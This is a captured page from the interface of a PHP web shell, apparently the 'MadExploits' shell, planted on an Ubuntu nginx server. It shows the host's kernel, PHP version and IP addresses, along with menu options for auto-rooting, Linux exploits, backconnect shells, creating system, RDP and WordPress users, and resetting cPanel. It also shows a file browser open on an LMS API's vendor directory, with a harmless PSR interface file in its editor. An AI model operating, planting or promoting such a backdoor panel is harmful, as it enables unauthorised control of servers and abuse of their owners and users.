Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-api /
vendor /
psr /
http-factory /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
RequestFactoryInterface.php
499
B
-rw-rw-r--
ResponseFactoryInterface.php
546
B
-rw-rw-r--
ServerRequestFactoryInterface....
927
B
-rw-rw-r--
StreamFactoryInterface.php
1.38
KB
-rw-rw-r--
UploadedFileFactoryInterface.p...
1.1
KB
-rw-rw-r--
UriFactoryInterface.php
325
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ResponseFactoryInterface.php
<?php namespace Psr\Http\Message; interface ResponseFactoryInterface { /** * Create a new response. * * @param int $code HTTP status code; defaults to 200 * @param string $reasonPhrase Reason phrase to associate with status code * in generated response; if none is provided implementations MAY use * the defaults as suggested in the HTTP specification. * * @return ResponseInterface */ public function createResponse(int $code = 200, string $reasonPhrase = ''): ResponseInterface; }
Close